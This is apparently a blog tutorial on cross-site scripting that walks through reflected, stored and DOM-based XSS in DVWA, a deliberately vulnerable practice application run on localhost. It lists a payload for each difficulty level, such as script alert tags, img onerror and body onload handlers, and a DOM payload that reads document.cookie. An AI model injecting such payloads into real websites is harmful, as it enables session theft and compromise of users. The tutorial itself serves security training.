Cross Site Scripting(XSS) | DVWA(Damn Vulnerable Web Applications)

XSS is a technique in which attackers inject malicious scripts into a target website and may allow them to gain access control of the website. If a website allows users to input data like comment, username field and email address field without controls then attacker can insert malicious code script as well.

TYPES OF XSS:

1. Reflected XSS

2. Stored XSS

3. Dom Base XSS

Reflected XSS(cross site scripting):RXSS

In this case, hacker data is not stored on the website. reflected XSS only execute on the victim side. reflected cross-site scripting A hacker sends input script that website then reflected back to the victim’s browser, where hacker it executed the malicious JavaScript payloads.

Let’s try cross site scripting virtual environment

Requirements:

1. Xampp or wamp

2. DVWA (Damn vulnerable web application)

3. Browser like Firefox, explorer, Cyberfox, Chrome e.t.c

DVWA low level Reflected XSS:

Payload: <script>alert(“xss”)</script>

DVWA Medium Level Reflected XSS

Payload : <Script>alert(“hack by falcon”)</Script>

DVWA High Level Reflected XSS

Payload: <img src=x onerror=alert(“falcon”)>

Stored XSS (Cross site scripting):SXSS

Stored cross-site scripting (XSS) In this case the hacker malicious code is stored target website and the web server. when an attacker can send malicious JavaScript into the website and that script is executed other users’ computers that is stored (XSS) cross-site scripting.

DVWA Low Level Stored XSS:

Payload: <script>alert(document.domain)</script>

DVWA Medium Level Stored XSS

Payload : <img src=x onerror=alert(document.domain)>

DVWA High Level Stored XSS

Payload : <body onload=alert(“bingo”)>

DOM BASE XSS:

Dom base (XSS) cross-site scripting attack is a short-form document object model based cross-site scripting. That is, the page itself HTTP response does not change, An attacker may use several DOM objects to create a Cross-site Scripting attack. The most popular objects from this perspective are documents.URL, document.location, and document.referrer.

DVWA low level DOM XSS:

Payload: localhost/dvwa/vulnerabilities/xss_d/?default=<script>alert(1)</script>

DVWA Medium level DOM BASE:

Payload: localhost/dvwa/vulnerabilities/xss_d/?default=English#<script>alert(1)</script> and reload your browser.

DVWA HIGH LEVEL DOM BASE:

Payload: localhost/dvwa/vulnerabilities/xss_d/?default=English#<script>alert(document.cookie)</script> and reload browser.

Reference:

1. https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A7-Cross-Site_Scripting_(XSS).html
2. https://bkimminich.gitbooks.io/pwning-owasp-juice-shop/content/part2/xss.html

Support by:

https://indiancybersecuritysolutions.com/

Thank you so much , have a great day. I hope it would be useful for cybersec community and WAPT.